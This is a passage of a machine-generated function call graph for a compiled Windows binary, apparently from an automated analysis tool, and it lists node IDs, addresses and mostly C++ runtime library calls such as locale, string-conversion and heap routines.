19000->19116 19003 22a250 23 API calls 19004 3d2922 19003->19004 19005 3d292f 19004->19005 19006 20a680 7 API calls 19004->19006 19007 20a680 7 API calls 19005->19007 19006->19005 19008 3d295a 19007->19008 19009 20a680 7 API calls 19008->19009 19009->18993 19011 510a59 std::_Facet_Register 16 API calls 19010->19011 19012 2e8ede 19011->19012 19013 2e8ef1 SysAllocString 19012->19013 19014 2e8f1c _com_issue_error 19012->19014 19013->19014 19015 2e8f8f SysFreeString 19014->19015 19016 2e8f32 std::ios_base::_Ios_base_dtor 19014->19016 19015->19016 19016->18944 19018 2e8f7e 19017->19018 19020 2e8f9c std::ios_base::_Ios_base_dtor 19017->19020 19019 2e8f8f SysFreeString 19018->19019 19018->19020 19019->19020 19020->18946 19022 510a59 std::_Facet_Register 16 API calls 19021->19022 19023 2e8e3e 19022->19023 19024 2e8e75 _com_issue_error 19023->19024 19134 512380 19023->19134 19024->18950 19029 510a5e 19026->19029 19027 521a8c __Getctype 15 API calls 19027->19029 19028 510a78 19028->18958 19029->19027 19029->19028 19030 533080 std::_Facet_Register 2 API calls 19029->19030 19032 209490 Concurrency::cancel_current_task 19029->19032 19030->19029 19031 510a84 19031->19031 19032->19031 19162 51307e 19032->19162 19034 2094ac 19034->18958 19036 3c6c09 std::locale::_Setgloballocale 19035->19036 19165 27ac60 19036->19165 19044 3c6c70 std::ios_base::_Ios_base_dtor 19045 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19044->19045 19046 3c6cad 19045->19046 19047 20b1c0 19046->19047 19048 20b25e 19047->19048 19051 20b1df 19047->19051 19049 209560 2 API calls 19048->19049 19054 20b263 19049->19054 19050 20b1eb std::locale::_Locimp::_Locimp 19050->18969 19051->19050 19052 20b550 23 API calls 19051->19052 19053 20b232 std::locale::_Locimp::_Locimp 19052->19053 19053->18969 19054->18969 19056 22a29b 19055->19056 19057 22a2e4 19056->19057 19058 22a37d 19056->19058 19065 22a2fe 19056->19065 19060 510a59 std::_Facet_Register 16 API calls 19057->19060 19741 20bdc0 19058->19741 19060->19065 19061 22a382 19062 22a418 19061->19062 19063 22a434 19061->19063 19064 22a3ee 19061->19064 19062->18971 19770 20b670 19063->19770 19746 20baa0 19064->19746 19065->18971 19068 22a3f4 19764 22a750 19068->19764 19070 20ad10 7 API calls 19071 22a439 19070->19071 19071->19070 19072 22a483 std::ios_base::_Ios_base_dtor 19071->19072 19073 22a4d7 std::ios_base::_Ios_base_dtor 19072->19073 19074 5215e8 7 API calls 19072->19074 19073->18971 19075 22a4fc 19074->19075 19075->18971 19079 20a8ce std::locale::_Locimp::_Locimp 19076->19079 19080 20a900 19076->19080 19077 20a9b4 19078 209560 2 API calls 19077->19078 19081 20a9b9 19078->19081 19079->18973 19080->19077 19082 20b550 23 API calls 19080->19082 19083 20a9e2 19081->19083 19084 20aa38 19081->19084 19085 20ab4c 19081->19085 19087 20a948 std::locale::_Locimp::_Locimp 19082->19087 19083->18973 19088 20b550 23 API calls 19084->19088 19086 209560 2 API calls 19085->19086 19096 20aa7b std::locale::_Locimp::_Locimp 19086->19096 19090 20a993 std::ios_base::_Ios_base_dtor 19087->19090 19094 5215e8 7 API calls 19087->19094 19088->19096 19089 5215e8 7 API calls 19091 20ab56 19089->19091 19090->18973 19092 20acd0 19091->19092 19093 20abcf 19091->19093 19097 20ab88 std::locale::_Locimp::_Locimp 19091->19097 19095 209560 2 API calls 19092->19095 19100 20b550 23 API calls 19093->19100 19094->19077 19096->19089 19099 20aaf2 std::ios_base::_Ios_base_dtor std::locale::_Locimp::_Locimp 19096->19099 19097->18973 19099->18973 19105 20a6ac std::ios_base::_Ios_base_dtor 19104->19105 19106 20a68b 19104->19106 19105->18980 19106->19105 19107 5215e8 7 API calls 19106->19107 19108 20a6d2 19107->19108 19108->18980 19782 2092d0 19109->19782 19112 20b1c0 23 API calls 19113 3cba6e 19112->19113 19114 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19113->19114 19115 3cba7b 19114->19115 19115->19003 19117 2791a0 19116->19117 19118 2791b5 19117->19118 19119 279226 19117->19119 19120 2791cb 19117->19120 19118->19000 19121 20bdc0 8 API calls 19119->19121 20009 20e460 19120->20009 19123 27922b 19121->19123 19125 20a680 7 API calls 19127 2791f2 19125->19127 19126 2791fa std::ios_base::_Ios_base_dtor 19126->19000 19128 20a680 7 API calls 19127->19128 19128->19126 19130 20df56 19129->19130 19133 20df1b std::ios_base::_Ios_base_dtor 19129->19133 19130->18999 19131 20df00 7 API calls 19131->19133 19132 20a680 7 API calls 19132->19133 19133->19130 19133->19131 19133->19132 19135 5123e0 19134->19135 19153 5123bd 19134->19153 19138 5124b3 _com_issue_error 19135->19138 19139 5123ff MultiByteToWideChar 19135->19139 19136 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19137 5123da 19136->19137 19137->19024 19140 5124c7 GetLastError 19138->19140 19139->19140 19141 51241c 19139->19141 19144 5124d1 _com_issue_error 19140->19144 19143 51242e __fassign 19141->19143 19155 521a8c 19141->19155 19143->19138 19146 51247a MultiByteToWideChar 19143->19146 19145 5124f0 GetLastError 19144->19145 19147 521898 __freea 14 API calls 19144->19147 19148 5124fa _com_issue_error 19145->19148 19146->19144 19149 51248e SysAllocString 19146->19149 19150 5124ed 19147->19150 19148->19024 19151 51249f 19149->19151 19154 5124a5 19149->19154 19150->19145 19152 521898 __freea 14 API calls 19151->19152 19152->19154 19153->19136 19154->19138 19154->19153 19160 535db3 __dosmaperr 19155->19160 19156 535df1 19158 528e21 _free 14 API calls 19156->19158 19157 535ddc RtlAllocateHeap 19159 535def 19157->19159 19157->19160 19158->19159 19159->19143 19160->19156 19160->19157 19161 533080 std::_Facet_Register 2 API calls 19160->19161 19161->19160 19163 5130c5 KiUserExceptionDispatcher 19162->19163 19164 513098 19162->19164 19163->19034 19164->19163 19194 27c0b0 19165->19194 19170 27ada0 19635 210f70 19170->19635 19173 27ae11 19174 20f530 25 API calls 19173->19174 19175 27aebe 19174->19175 19177 27aed6 19175->19177 19658 2110b0 19175->19658 19179 27cdd0 19177->19179 19180 27ce1d 19179->19180 19672 27dab0 19180->19672 19182 27ce32 19183 27cef1 19182->19183 19185 27d300 96 API calls 19182->19185 19184 20f530 25 API calls 19183->19184 19186 27cf92 19184->19186 19187 27ce65 19185->19187 19189 27a890 19186->19189 19187->19183 19683 27d950 19187->19683 19190 27a89f 19189->19190 19192 27a8e1 std::ios_base::_Ios_base_dtor 19189->19192 19191 5215e8 7 API calls 19190->19191 19190->19192 19193 27a965 19191->19193 19192->19044 19193->19044 19202 27cc80 19194->19202 19197 27cb00 19198 510a59 std::_Facet_Register 16 API calls 19197->19198 19199 27cb3a 19198->19199 19200 500d66 std::locale::_Init 72 API calls 19199->19200 19201 27ad0d 19200->19201 19201->19170 19209 279a50 19202->19209 19206 27ace4 19206->19197 19210 20f530 25 API calls 19209->19210 19211 279ac5 19210->19211 19212 510a59 std::_Facet_Register 16 API calls 19211->19212 19213 279acc 19212->19213 19248 500d66 19213->19248 19215 279ae6 19216 27d300 19215->19216 19217 5009cc std::_Lockit::_Lockit 7 API calls 19216->19217 19218 27d351 19217->19218 19219 5009cc std::_Lockit::_Lockit 7 API calls 19218->19219 19222 27d393 19218->19222 19220 27d373 19219->19220 19223 500a24 std::_Lockit::~_Lockit 2 API calls 19220->19223 19221 500a24 std::_Lockit::~_Lockit 2 API calls 19224 27d4a1 19221->19224 19225 27d3e8 19222->19225 19227 510a59 std::_Facet_Register 16 API calls 19222->19227 19223->19222 19226 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19224->19226 19225->19221 19228 27ccd9 19226->19228 19229 27d3f6 19227->19229 19228->19206 19239 20f530 19228->19239 19365 20eff0 19229->19365 19240 20f552 19239->19240 19241 20f54a 19239->19241 19240->19206 19242 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 19241->19242 19243 20f562 19241->19243 19242->19243 19516 20f480 19243->19516 19246 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 19247 20f5a7 19246->19247 19247->19206 19249 500d72 std::locale::_Init 19248->19249 19260 5009cc 19249->19260 19254 500d90 19272 500f1e 19254->19272 19255 500dee std::locale::_Init 19255->19215 19259 500dae 19283 500a24 19259->19283 19261 5009db 19260->19261 19264 5009e2 19260->19264 19290 532618 19261->19290 19263 5009e0 19263->19259 19266 500efb 19263->19266 19264->19263 19295 410280 RtlEnterCriticalSection 19264->19295 19267 510a59 std::_Facet_Register 16 API calls 19266->19267 19269 500f06 19267->19269 19268 500f1a 19268->19254 19269->19268 19347 500c4e 19269->19347 19273 500f2a 19272->19273 19274 500d98 19272->19274 19350 50405a 19273->19350 19276 2ccd10 19274->19276 19277 2ccd6c 19276->19277 19278 2ccd20 19276->19278 19277->19259 19279 521898 __freea 14 API calls 19278->19279 19280 2ccd2a 19278->19280 19279->19280 19280->19277 19280->19280 19281 521a8c __Getctype 15 API calls 19280->19281 19282 2ccd4f std::locale::_Locimp::_Locimp 19281->19282 19282->19259 19284 532626 19283->19284 19285 500a2e 19283->19285 19364 532601 RtlLeaveCriticalSection 19284->19364 19286 500a41 19285->19286 19363 4102d0 RtlLeaveCriticalSection 19285->19363 19286->19255 19289 53262d 19289->19255 19296 538293 19290->19296 19295->19263 19317 537a82 19296->19317 19316 5382c5 19316->19316 19318 537c67 std::_Lockit::_Lockit 5 API calls 19317->19318 19319 537a98 19318->19319 19320 537a9c 19319->19320 19321 537c67 std::_Lockit::_Lockit 5 API calls 19320->19321 19322 537ab2 19321->19322 19323 537ab6 19322->19323 19324 537c67 std::_Lockit::_Lockit 5 API calls 19323->19324 19325 537acc 19324->19325 19326 537ad0 19325->19326 19327 537c67 std::_Lockit::_Lockit 5 API calls 19326->19327 19328 537ae6 19327->19328 19329 537aea 19328->19329 19330 537c67 std::_Lockit::_Lockit 5 API calls 19329->19330 19331 537b00 19330->19331 19332 537b04 19331->19332 19333 537c67 std::_Lockit::_Lockit 5 API calls 19332->19333 19334 537b1a 19333->19334 19335 537b1e 19334->19335 19336 537c67 std::_Lockit::_Lockit 5 API calls 19335->19336 19337 537b34 19336->19337 19338 537b38 19337->19338 19339 537c67 std::_Lockit::_Lockit 5 API calls 19338->19339 19340 537b4e 19339->19340 19341 537b6c 19340->19341 19342 537c67 std::_Lockit::_Lockit 5 API calls 19341->19342 19343 537b82 19342->19343 19344 537b52 19343->19344 19345 537c67 std::_Lockit::_Lockit 5 API calls 19344->19345 19346 537b68 19345->19346 19346->19316 19348 2ccd10 std::locale::_Locimp::_Locimp 15 API calls 19347->19348 19349 500c88 19348->19349 19349->19254 19351 52df58 19350->19351 19352 50406a RtlEncodePointer 19350->19352 19353 53a11f std::locale::_Setgloballocale 2 API calls 19351->19353 19352->19274 19354 52df5d 19353->19354 19355 52df68 19354->19355 19356 53a164 std::locale::_Setgloballocale 66 API calls 19354->19356 19357 52df72 IsProcessorFeaturePresent 19355->19357 19358 52df91 19355->19358 19356->19355 19359 52df7e 19357->19359 19360 5312ca std::locale::_Setgloballocale 23 API calls 19358->19360 19361 52142c std::locale::_Setgloballocale 4 API calls 19359->19361 19362 52df9b 19360->19362 19361->19358 19362->19274 19363->19286 19364->19289 19366 5009cc std::_Lockit::_Lockit 7 API calls 19365->19366 19367 20f020 19366->19367 19368 20f086 19367->19368 19369 20f068 19367->19369 19425 500979 19368->19425 19416 500e66 19369->19416 19374 500ff7 19473 5328e0 19374->19473 19376 501000 __Getctype 19377 501038 19376->19377 19378 50101a 19376->19378 19380 5328bc __Getctype 66 API calls 19377->19380 19379 5328bc __Getctype 66 API calls 19378->19379 19381 501021 19379->19381 19380->19381 19478 53292a 19381->19478 19384 27d43c 19386 50127a 19384->19386 19387 50128d std::locale::_Setgloballocale 19386->19387 19388 5328e0 __Getctype 66 API calls 19387->19388 19389 501295 19388->19389 19507 532951 19389->19507 19392 53292a __Getctype 66 API calls 19393 5012a4 19392->19393 19394 27d452 19393->19394 19395 5328bc __Getctype 66 API calls 19393->19395 19395->19394 19430 532884 19416->19430 19419 2ccd10 std::locale::_Locimp::_Locimp 15 API calls 19420 500e8a 19419->19420 19421 500e9a 19420->19421 19422 532884 std::_Locinfo::_Locinfo_ctor 91 API calls 19420->19422 19423 2ccd10 std::locale::_Locimp::_Locimp 15 API calls 19421->19423 19422->19421 19424 20f06f 19423->19424 19424->19374 19469 209570 19425->19469 19428 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 19429 20f090 19428->19429 19431 538293 std::_Lockit::_Lockit 5 API calls 19430->19431 19432 532891 19431->19432 19435 53262f 19432->19435 19436 53263b std::_Locinfo::_Locinfo_ctor 19435->19436 19443 5325b9 RtlEnterCriticalSection 19436->19443 19438 532649 19444 53268a 19438->19444 19443->19438 19445 5327e9 std::_Locinfo::_Locinfo_ctor 91 API calls 19444->19445 19446 5326a5 19445->19446 19447 532656 19446->19447 19448 536413 __Getctype 66 API calls 19446->19448 19466 53267e 19447->19466 19449 5326b2 19448->19449 19450 53cd40 std::_Locinfo::_Locinfo_ctor 67 API calls 19449->19450 19451 5326d7 19450->19451 19452 5326de 19451->19452 19453 535db3 std::_Locinfo::_Locinfo_ctor 15 API calls 19451->19453 19452->19447 19454 521605 __Getctype 7 API calls 19452->19454 19455 532703 19453->19455 19456 5327e8 19454->19456 19455->19447 19457 53cd40 std::_Locinfo::_Locinfo_ctor 67 API calls 19455->19457 19458 53271f 19457->19458 19459 532741 19458->19459 19460 532726 19458->19460 19463 535d79 _free 14 API calls 19459->19463 19464 53276c 19459->19464 19460->19452 19461 532738 19460->19461 19462 535d79 _free 14 API calls 19461->19462 19462->19447 19463->19464 19464->19447 19465 535d79 _free 14 API calls 19464->19465 19465->19447 19467 532601 std::_Lockit::~_Lockit RtlLeaveCriticalSection 19466->19467 19468 500e72 19467->19468 19468->19419 19470 2095a7 19469->19470 19471 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19470->19471 19472 2095bd 19471->19472 19472->19428 19474 536413 __Getctype 66 API calls 19473->19474 19475 5328eb 19474->19475 19476 536665 __Getctype 66 API calls 19475->19476 19477 5328fb 19476->19477 19477->19376 19479 536413 __Getctype 66 API calls 19478->19479 19480 532935 19479->19480 19481 536665 __Getctype 66 API calls 19480->19481 19482 501049 19481->19482 19482->19384 19483 531a90 19482->19483 19484 531a9d 19483->19484 19485 531ad8 19483->19485 19486 521a8c __Getctype 15 API calls 19484->19486 19485->19384 19487 531ac0 19486->19487 19487->19485 19496 521a97 19487->19496 19489 531ad1 19489->19485 19503 521605 IsProcessorFeaturePresent 19489->19503 19497 521ab2 19496->19497 19498 521aa4 19496->19498 19499 528e21 _free 14 API calls 19497->19499 19498->19497 19501 521acb 19498->19501 19500 521abc __Getctype 19499->19500 19500->19489 19501->19500 19502 528e21 _free 14 API calls 19501->19502 19502->19500 19504 521611 19503->19504 19505 52142c std::locale::_Setgloballocale 4 API calls 19504->19505 19506 521626 GetCurrentProcess TerminateProcess 19505->19506 19508 536413 __Getctype 66 API calls 19507->19508 19509 53295c 19508->19509 19510 536665 __Getctype 66 API calls 19509->19510 19511 50129c 19510->19511 19511->19392 19517 20f4d5 19516->19517 19524 20b300 19517->19524 19519 20f4e9 19540 20ec60 19519->19540 19523 20f505 19523->19246 19525 20b392 19524->19525 19531 20b31b 19524->19531 19574 209560 19525->19574 19527 20b327 std::locale::_Locimp::_Locimp 19527->19519 19531->19527 19560 20b5b0 19531->19560 19534 20b36b std::locale::_Locimp::_Locimp 19534->19519 19593 20a550 19540->19593 19542 20ecbb 19543 20ece3 19542->19543 19602 2107a0 19542->19602 19545 2107a0 25 API calls 19543->19545 19546 20ed0c 19545->19546 19547 20ad10 7 API calls 19546->19547 19548 20ed14 19547->19548 19549 20ad10 7 API calls 19548->19549 19550 20ed40 19549->19550 19551 20ad10 7 API calls 19550->19551 19552 20ed7d 19551->19552 19553 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19552->19553 19554 20eda8 19553->19554 19555 20ad10 19554->19555 19556 20ad1b 19555->19556 19557 20ad36 std::ios_base::_Ios_base_dtor 19555->19557 19556->19557 19558 5215e8 7 API calls 19556->19558 19557->19523 19559 20ad5a 19558->19559 19559->19523 19561 20b5e0 19560->19561 19562 20b5bd 19560->19562 19565 20b5f1 19561->19565 19566 510a59 std::_Facet_Register 16 API calls 19561->19566 19563 20b5c4 19562->19563 19564 20b5f7 19562->19564 19568 510a59 std::_Facet_Register 16 API calls 19563->19568 19577 209490 19564->19577 19565->19534 19569 20b5ea 19566->19569 19570 20b5ca 19568->19570 19569->19534 19572 20b5d3 19570->19572 19581 5215e8 19570->19581 19572->19534 19585 500919 19574->19585 19578 20949e Concurrency::cancel_current_task 19577->19578 19579 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 19578->19579 19580 2094ac 19579->19580 19580->19570 19582 5215f7 19581->19582 19583 521605 __Getctype 7 API calls 19582->19583 19584 521604 19583->19584 19590 5006fa 19585->19590 19588 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 19589 500938 19588->19589 19591 209390 std::invalid_argument::invalid_argument IsProcessorFeaturePresent 19590->19591 19592 50070c 19591->19592 19592->19588 19594 20a57a 19593->19594 19595 20a5fa 19594->19595 19599 20a58a 19594->19599 19596 209560 2 API calls 19595->19596 19598 20a5ff 19596->19598 19597 20a596 std::locale::_Locimp::_Locimp 19597->19542 19598->19542 19599->19597 19600 20b5b0 23 API calls 19599->19600 19601 20a5d7 std::locale::_Locimp::_Locimp 19600->19601 19601->19542 19603 2107ff 19602->19603 19607 2107c8 std::locale::_Locimp::_Locimp 19602->19607 19604 2108fb 19603->19604 19605 21080e 19603->19605 19606 209560 2 API calls 19604->19606 19608 20b5b0 23 API calls 19605->19608 19614 210855 std::locale::_Locimp::_Locimp 19606->19614 19607->19543 19608->19614 19609 5215e8 7 API calls 19610 210905 19609->19610 19611 210929 19610->19611 19616 210937 19610->19616 19619 2109b0 19611->19619 19613 210963 19613->19543 19614->19609 19618 2108b2 std::ios_base::_Ios_base_dtor std::locale::_Locimp::_Locimp 19614->19618 19615 210931 19615->19543 19616->19613 19627 210970 19616->19627 19618->19543 19620 2109d1 19619->19620 19621 210a58 19620->19621 19626 2109e4 std::locale::_Setgloballocale 19620->19626 19632 210a60 19621->19632 19624 210a05 __Getctype std::locale::_Locimp::_Locimp 19624->19615 19625 528e21 _free 14 API calls 19625->19624 19626->19624 19626->19625 19628 210984 19627->19628 19629 210a60 3 API calls 19628->19629 19631 210997 19628->19631 19630 2109a7 19629->19630 19631->19613 19633 20f610 InitializeCriticalSectionEx GetLastError KiUserExceptionDispatcher 19632->19633 19634 210a6a 19633->19634 19637 210fac 19635->19637 19636 210fc7 19636->19173 19639 27cfd0 19636->19639 19637->19636 19662 210cb0 19637->19662 19640 5009cc std::_Lockit::_Lockit 7 API calls 19639->19640 19641 27d00b 19640->19641 19642 5009cc std::_Lockit::_Lockit 7 API calls 19641->19642 19645 27d04d 19641->19645 19643 27d02d 19642->19643 19647 500a24 std::_Lockit::~_Lockit 2 API calls 19643->19647 19644 500a24 std::_Lockit::~_Lockit 2 API calls 19646 27d10a 19644->19646 19649 510a59 std::_Facet_Register 16 API calls 19645->19649 19657 27d095 19645->19657 19648 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19646->19648 19647->19645 19650 27d124 19648->19650 19651 27d0a0 19649->19651 19650->19173 19652 20eff0 94 API calls 19651->19652 19653 27d0d0 19652->19653 19654 20f0a0 92 API calls 19653->19654 19655 27d0e5 19654->19655 19656 500d34 std::_Facet_Register 16 API calls 19655->19656 19656->19657 19657->19644 19659 211119 19658->19659 19660 2110ee 19658->19660 19659->19177 19660->19659 19661 20f530 25 API calls 19660->19661 19661->19659 19663 210cf4 19662->19663 19669 210d89 19662->19669 19665 210f70 25 API calls 19663->19665 19664 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19666 210dbc 19664->19666 19667 210cfd 19665->19667 19666->19636 19668 210d71 19667->19668 19670 20f530 25 API calls 19667->19670 19668->19669 19671 2110b0 25 API calls 19668->19671 19669->19664 19670->19668 19671->19669 19673 27daee 19672->19673 19674 27db1d 19672->19674 19675 20f530 25 API calls 19673->19675 19677 210cb0 25 API calls 19674->19677 19678 27db29 19674->19678 19676 27db07 19675->19676 19676->19182 19677->19678 19679 27d300 96 API calls 19678->19679 19681 27dbfa 19678->19681 19682 27db63 19679->19682 19680 20f530 25 API calls 19680->19681 19681->19182 19682->19680 19682->19681 19684 27d967 19683->19684 19685 27d98b 19683->19685 19684->19187 19686 27da72 19685->19686 19687 27d99d 19685->19687 19688 209560 2 API calls 19686->19688 19697 20b550 19687->19697 19696 27d9da std::locale::_Locimp::_Locimp 19688->19696 19690 5215e8 7 API calls 19691 27da7c 19690->19691 19692 27da8b 19691->19692 19712 20b030 19691->19712 19692->19187 19695 27da33 std::ios_base::_Ios_base_dtor std::locale::_Locimp::_Locimp 19695->19187 19696->19690 19696->19695 19698 20b5a0 19697->19698 19699 20b55d 19697->19699 19702 209490 Concurrency::cancel_current_task KiUserExceptionDispatcher 19698->19702 19700 20b566 19699->19700 19701 20b589 19699->19701 19700->19698 19703 20b56d 19700->19703 19704 20b59a 19701->19704 19708 510a59 std::_Facet_Register 16 API calls 19701->19708 19705 20b573 19702->19705 19707 510a59 std::_Facet_Register 16 API calls 19703->19707 19704->19696 19706 5215e8 7 API calls 19705->19706 19711 20b57c 19705->19711 19709 20b5aa 19706->19709 19707->19705 19710 20b593 19708->19710 19710->19696 19711->19696 19729 500939 19712->19729 19734 500734 19729->19734 19732 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 19733 500958 19732->19733 19737 209390 19734->19737 19738 2093c7 19737->19738 19739 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19738->19739 19740 2093d7 19739->19740 19740->19732 19742 500919 2 API calls 19741->19742 19743 20bdca 19742->19743 19744 20df00 7 API calls 19743->19744 19745 20bdde std::ios_base::_Ios_base_dtor 19744->19745 19745->19061 19747 20baf4 19746->19747 19748 20baad 19746->19748 19749 209490 Concurrency::cancel_current_task KiUserExceptionDispatcher 19747->19749 19750 20baba 19748->19750 19751 20badd 19748->19751 19753 20bac7 19749->19753 19750->19747 19754 20bac1 19750->19754 19752 20baee 19751->19752 19755 510a59 std::_Facet_Register 16 API calls 19751->19755 19752->19068 19756 5215e8 7 API calls 19753->19756 19761 20bad0 19753->19761 19757 510a59 std::_Facet_Register 16 API calls 19754->19757 19758 20bae7 19755->19758 19759 20bafe 19756->19759 19757->19753 19758->19068 19761->19068 19771 500919 2 API calls 19770->19771 19772 20b67a 19771->19772 19772->19071 19785 2092a0 19782->19785 19786 2092b5 19785->19786 19789 520ac0 19786->19789 19792 51d606 19789->19792 19791 2092bf 19791->19112 19793 51d611 19792->19793 19794 51d626 19792->19794 19795 528e21 _free 14 API calls 19793->19795 19796 51d66a 19794->19796 19799 51d634 19794->19799 19798 51d616 __Getctype 19795->19798 19797 528e21 _free 14 API calls 19796->19797 19802 51d662 __Getctype 19797->19802 19798->19791 19804 51d289 19799->19804 19802->19791 19803 528e21 _free 14 API calls 19803->19802 19805 51d2b1 19804->19805 19806 51d2c9 19804->19806 19808 528e21 _free 14 API calls 19805->19808 19806->19805 19807 51d2d1 19806->19807 19809 51dc52 __fassign 66 API calls 19807->19809 19810 51d2b6 __Getctype 19808->19810 19812 51d2e1 19809->19812 19811 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19810->19811 19813 51d3ef 19811->19813 19817 51e5c7 19812->19817 19813->19802 19813->19803 19816 51d368 19829 51dce5 19816->19829 19832 520275 19817->19832 19819 51e5ec __Getctype 19819->19816 19820 51e5e7 19821 528e21 _free 14 API calls 19820->19821 19821->19819 19822 51e5d8 19822->19819 19822->19820 19837 51e7c6 19822->19837 19842 51f881 19822->19842 19847 51e985 19822->19847 19852 51edc0 19822->19852 19881 51f5f9 19822->19881 19905 520290 19822->19905 19830 535d79 _free 14 API calls 19829->19830 19831 51dcf5 19830->19831 19831->19810 19833 52027a 19832->19833 19834 52028d 19832->19834 19835 528e21 _free 14 API calls 19833->19835 19834->19822 19836 52027f __Getctype 19835->19836 19836->19822 19838 51e7cb 19837->19838 19839 51e7e2 19838->19839 19840 528e21 _free 14 API calls 19838->19840 19839->19822 19841 51e7d4 __Getctype 19840->19841 19841->19822 19843 51f892 19842->19843 19844 51f88b 19842->19844 19843->19822 19910 51e0e9 19844->19910 19848 51e98f 19847->19848 19850 51e996 19847->19850 19849 51e0e9 67 API calls 19848->19849 19851 51e995 19849->19851 19850->19822 19851->19822 19853 51ede7 19852->19853 19854 51edcc 19852->19854 19857 528e21 _free 14 API calls 19853->19857 19858 51ee19 19853->19858 19855 51f620 19854->19855 19856 51f68b 19854->19856 19854->19858 19865 51f62c 19855->19865 19869 51f662 19855->19869 19860 51f6d1 19856->19860 19861 51f692 19856->19861 19856->19869 19859 51ee04 __Getctype 19857->19859 19858->19822 19859->19822 19947 520111 19860->19947 19863 51f697 19861->19863 19864 51f639 19861->19864 19863->19869 19870 51f69c 19863->19870 19879 51f647 19864->19879 19880 51f65b 19864->19880 19941 51fb11 19864->19941 19865->19864 19868 51f672 19865->19868 19865->19879 19868->19880 19922 51fd0b 19868->19922 19869->19879 19869->19880 19934 51fef2 19869->19934 19871 51f6a1 19870->19871 19872 51f6af 19870->19872 19871->19880 19926 5200da 19871->19926 19930 520047 19872->19930 19873 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19877 51f854 19873->19877 19877->19822 19879->19880 19950 520606 19879->19950 19880->19873 19882 51f620 19881->19882 19883 51f68b 19881->19883 19890 51f662 19882->19890 19891 51f62c 19882->19891 19884 51f6d1 19883->19884 19885 51f692 19883->19885 19883->19890 19888 520111 15 API calls 19884->19888 19886 51f697 19885->19886 19887 51f639 19885->19887 19886->19890 19894 51f69c 19886->19894 19893 51fb11 71 API calls 19887->19893 19903 51f647 19887->19903 19904 51f65b 19887->19904 19888->19903 19889 51f672 19899 51fd0b 66 API calls 19889->19899 19889->19904 19892 51fef2 15 API calls 19890->19892 19890->19903 19890->19904 19891->19887 19891->19889 19891->19903 19892->19903 19893->19903 19895 51f6a1 19894->19895 19896 51f6af 19894->19896 19900 5200da 15 API calls 19895->19900 19895->19904 19898 520047 14 API calls 19896->19898 19897 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 19901 51f854 19897->19901 19898->19903 19899->19903 19900->19903 19901->19822 19902 520606 66 API calls 19902->19904 19903->19902 19903->19904 19904->19897 19906 520296 19905->19906 19907 5202af 19905->19907 19906->19907 19908 528e21 _free 14 API calls 19906->19908 19907->19822 19909 5202a1 __Getctype 19908->19909 19909->19822 19911 51e100 19910->19911 19912 51e0fb 19910->19912 19918 52a1c9 19911->19918 19913 528e21 _free 14 API calls 19912->19913 19913->19911 19916 528e21 _free 14 API calls 19917 51e134 19916->19917 19917->19822 19919 52a1e4 19918->19919 19920 529175 std::_Locinfo::_Locinfo_ctor 67 API calls 19919->19920 19921 51e120 19920->19921 19921->19916 19921->19917 19923 51fd3a 19922->19923 19925 51fd66 19923->19925 19954 535e01 19923->19954 19925->19879 19927 5200e6 19926->19927 19928 51fef2 15 API calls 19927->19928 19929 5200f8 19928->19929 19929->19879 19933 52005c 19930->19933 19931 528e21 _free 14 API calls 19932 520065 __Getctype 19931->19932 19932->19879 19933->19931 19933->19932 19935 51ff05 19934->19935 19936 51ff20 19935->19936 19938 51ff37 19935->19938 19937 528e21 _free 14 API calls 19936->19937 19940 51ff25 __Getctype 19937->19940 19938->19940 19970 51d72e 19938->19970 19940->19879 19942 51fb31 19941->19942 19980 51d6b1 19942->19980 19944 51fb72 19990 537072 19944->19990 19946 51fbe9 19946->19879 19946->19946 19948 51fef2 15 API calls 19947->19948 19949 520128 19948->19949 19949->19879 19952 52066a 19950->19952 19953 520619 19950->19953 19951 535e01 __fassign 66 API calls 19951->19953 19952->19880 19953->19951 19953->19952 19955 535e16 19954->19955 19956 535e26 19954->19956 19955->19956 19957 51dc52 __fassign 66 API calls 19955->19957 19956->19925 19958 535e47 19957->19958 19959 535e53 19958->19959 19960 535e74 19958->19960 19961 5421bf __fassign 15 API calls 19959->19961 19960->19956 19962 53c263 __fassign 66 API calls 19960->19962 19961->19956 19963 535e9f 19962->19963 19964 535ee7 19963->19964 19965 535ea5 19963->19965 19966 53794e __fassign MultiByteToWideChar 19964->19966 19967 535ecd 19965->19967 19968 53794e __fassign MultiByteToWideChar 19965->19968 19966->19967 19967->19956 19969 528e21 _free 14 API calls 19967->19969 19968->19967 19969->19956 19971 51d743 19970->19971 19972 51d752 19970->19972 19973 528e21 _free 14 API calls 19971->19973 19974 51d748 19972->19974 19975 535db3 std::_Locinfo::_Locinfo_ctor 15 API calls 19972->19975 19973->19974 19974->19940 19976 51d77a 19975->19976 19977 51d791 19976->19977 19978 51dcff 14 API calls 19976->19978 19979 535d79 _free 14 API calls 19977->19979 19978->19977 19979->19974 19981 51d6d5 19980->19981 19982 51d6c6 19980->19982 19984 51d6cb 19981->19984 19985 535db3 std::_Locinfo::_Locinfo_ctor 15 API calls 19981->19985 19983 528e21 _free 14 API calls 19982->19983 19983->19984 19984->19944 19986 51d6fc 19985->19986 19987 51d713 19986->19987 19988 51dcff 14 API calls 19986->19988 19989 535d79 _free 14 API calls 19987->19989 19988->19987 19989->19984 19991 537082 19990->19991 19992 537098 19990->19992 19993 528e21 _free 14 API calls 19991->19993 19992->19991 19994 5370aa 19992->19994 20003 537087 __Getctype 19993->20003 19995 537115 19994->19995 19996 5370e6 19994->19996 19997 53713e 19995->19997 19998 537143 19995->19998 19999 536f16 21 API calls 19996->19999 20000 537167 19997->20000 20001 5371a9 19997->20001 20002 5367c4 71 API calls 